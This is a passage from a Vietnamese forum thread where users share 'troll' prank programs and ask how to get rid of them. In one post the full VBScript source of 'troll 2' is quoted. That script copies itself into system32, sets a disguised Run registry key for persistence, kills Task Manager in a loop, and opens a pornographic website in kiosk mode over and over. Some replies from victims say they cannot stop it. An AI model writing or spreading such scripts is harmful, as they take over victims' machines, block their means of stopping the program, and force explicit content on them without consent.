Reply
 
Thread Tools
  #361  
Old 15-12-2012, 00:40
emkopostsexsaolairadao emkopostsexsaolairadao is offline
K.I.A
Join Date: 04-2011
Location: Đảo K.I.A
Posts: 22
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by sieunhanruoi View Post
vãn bị thớt ơi ((

vẫn bị thớt ơi ((
Vừa nãy gõ nhầm cái ip 44 với 43 . với lại

Vào thư mục C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ Với Windows 7

Or C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ với windows Xp

Delete tất cả các file .bat đi nhé
Reply With Quote
  #362  
Old 15-12-2012, 00:46
sieunhanruoi's Avatar
sieunhanruoi sieunhanruoi is offline
K.I.A
Join Date: 09-2008
Location: Paradise
Posts: 518
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by emkopostsexsaolairadao View Post
Vừa nãy gõ nhầm cái ip 44 với 43 . với lại

Vào thư mục C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ Với Windows 7

Or C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ với windows Xp

Delete tất cả các file .bat đi nhé
tìm xong thì xóa đi r mới sav hả thím?
Reply With Quote
  #363  
Old 15-12-2012, 00:51
darkspec92's Avatar
darkspec92 darkspec92 is offline
Senior Member
Join Date: 04-2012
Posts: 303
Re: [Hội những người thích troll]Ứng dụng để troll

ai bít cách xóa version 9 ko khó chịu vãi éo vào được run
Reply With Quote
  #364  
Old 15-12-2012, 00:58
khonghieusaobiban's Avatar
khonghieusaobiban khonghieusaobiban is offline
Junior Member
Join Date: 12-2012
Posts: 18
Re: [Hội những người thích troll]Ứng dụng để troll

sao ko tắt đươc vậy
Reply With Quote
  #365  
Old 15-12-2012, 01:09
emkopostsexsaolairadao emkopostsexsaolairadao is offline
K.I.A
Join Date: 04-2011
Location: Đảo K.I.A
Posts: 22
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by khonghieusaobiban View Post
sao ko tắt đươc vậy
Tắt được thì gọi gì là troll
Reply With Quote
  #366  
Old 15-12-2012, 01:49
suyaku92's Avatar
suyaku92 suyaku92 is offline
Senior Member
Join Date: 09-2008
Location: Finland
Posts: 124
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by emkopostsexsaolairadao View Post
Cách giải quyết thì mình post rồi . Còn các bạn ý có đọc hay không mới là vấn đề
nói rồi mà cái post đó nằm lọt giữa mấy chục trang thì
bạn nên up cái link hd cách vô hiệu hóa mấy cái này ở #1 (để chữ trắng cũng đc )
Reply With Quote
  #367  
Old 15-12-2012, 10:10
Brad Delson's Avatar
Brad Delson Brad Delson is offline
Member
Join Date: 08-2012
Location: Đảo
Posts: 38
Re: [Hội những người thích troll]Ứng dụng để troll

cái ver 8 thì sao
__________________
Quote:
Originally Posted by buzzno4 View Post
Chả là em có thằng bạn khá thân từ ngày xưa, 2 thằng thân nhau như chó, ăn cùng mâm, ngủ cùng giường, tý thì yêu cùng 1 con luôn
Quote:
Originally Posted by BulletForMyValentine View Post
hai thím thân nhau như vậy có bị dính lẹo bao giờ chưa :sexy:
Vãi bạn thân :lmao:
Reply With Quote
  #368  
Old 15-12-2012, 21:47
anh_23 anh_23 is offline
Junior Member
Join Date: 05-2012
Posts: 0
Re: [Hội những người thích troll]Ứng dụng để troll

thằng chủ thớt khá lắm. đê ma ma
Reply With Quote
  #369  
Old 16-12-2012, 15:19
chivas_91's Avatar
chivas_91 chivas_91 is offline
Senior Member
Join Date: 02-2012
Location: Phú lăng sa
Posts: 199
Re: [Hội những người thích troll]Ứng dụng để troll

đéo hiểu sao dính con v6 làm như thớt vẫn đéo hết....thi thoảng vẫn hiện 1 đống folder sex
__________________
Quote:
Originally Posted by chivas_91 View Post
đéo quan tâm dài 12cm chu vi 12cm.....chuẩn hàng VN

Quote:
Originally Posted by thang1110 View Post
Con rắn vuông cmnr :stick:
Reply With Quote
  #370  
Old 19-12-2012, 22:05
vumanh.cuong's Avatar
vumanh.cuong vumanh.cuong is offline
Member
Join Date: 12-2011
Location: Nam Định tôi yêu
Posts: 77
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by mistake37 View Post
Source troll 2, :O

Code:
Dim wshShell, objRandom, randomfolder, randomname, param, reg, objFSO, objFolder, objCreate, sleeptime, dteWait

Set objRandom = CreateObject( "System.Random" )

Set wshShell = CreateObject("WScript.Shell")

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFolder = objFSO.GetFolder(".")randomfolder =  "c:\windows\system32\" & objRandom.Next_2( 1000, 9999 ) & "\"

objCreate = objFSO.CreateFolder(randomfolder)

randomname = randomfolder & objRandom.Next_2( 1000, 9999 ) & ".vbs"

param = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbs"+  chr(34) + " " + chr(34) + randomname + chr(34)

wshShell.Run param , 0, True

reg = "wscript.exe //b //nologo " + chr(34) + randomname + chr(34)

do

sleeptime = objRandom.Next_2( 5, 30 )

wshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TurboBoost", reg, "REG_SZ"

dteWait = DateAdd("s", sleeptime, Now())

Do Until (Now() > dteWait)

wshShell.Run "taskkill /im taskmgr.exe", 0, True

Loop

wscript.Sleep sleeptime

wshShell.Run "iexplore.exe -k http://www.xvideos.com"

loop
Vãi loop
thớt ơi tắt cái này đi như nào
chỉ gấp em với
__________________
Quote:
Quote:
Quote:
Ký tên
Reply With Quote
Reply

« Previous Thread | Next Thread »
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT +7. The time now is 00:32.